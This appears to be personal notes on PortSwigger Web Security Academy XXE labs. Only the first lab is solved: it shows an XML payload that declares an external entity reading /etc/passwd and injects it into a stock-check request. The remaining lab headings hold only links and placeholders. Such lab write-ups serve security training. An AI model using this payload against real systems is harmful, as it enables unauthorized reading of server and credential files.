---
title: 'XML External Entity (XXE) Injection'
subtitle: 'PortSwigger Web Security Academy Labs'
author: 'Dan Egner'
date: 'PDF generated: \today'

titlepage: true
toc: true
---




# Exploiting XXE using external entities to retrieve files

<https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files>

Completed: 2022-12-20


## Summary

TKTK


## Objective

> This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.
>
>> To solve the lab, inject an XML external entity to retrieve the contents of the `/etc/passwd` file.


## Solution

1. Use the check stock functionality at `POST /product/stock`. This request body contains the following XML:

    ```xml
	<?xml version="1.0" encoding="UTF-8"?>
		<stockCheck>
			<productId>
				1
			</productId>
			<storeId>
				1
			</storeId>
		</stockCheck>
    ```

1. Send the request to Repeater and change the XML to the following:

    ```xml
	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
		<stockCheck>
			<productId>
				&xxe;
			</productId>
			<storeId>
				1
			</storeId>
		</stockCheck>
    ```

	The response contains the contents of `/etc/passwd`.




# Exploiting XXE to perform SSRF attacks

<https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf>

Completed: TKTK




# Blind XXE with out-of-band interaction

<https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction>

Completed: TKTK




# Blind XXE with out-of-band interaction via XML parameter entities

<https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities>

Completed: TKTK




# Exploiting blind XXE to exfiltrate data using a malicious external DTD

<https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration>

Completed: TKTK




# Exploiting blind XXE to retrieve data via error messages

<https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages>

Completed: TKTK




# Exploiting XXE to retrieve data by repurposing a local DTD

<https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd>

Completed: TKTK




# Exploiting XInclude to retrieve files

<https://portswigger.net/web-security/xxe/lab-xinclude-attack>

Completed: TKTK




# Exploiting XXE via image file upload

<https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload>

Completed: TKTK

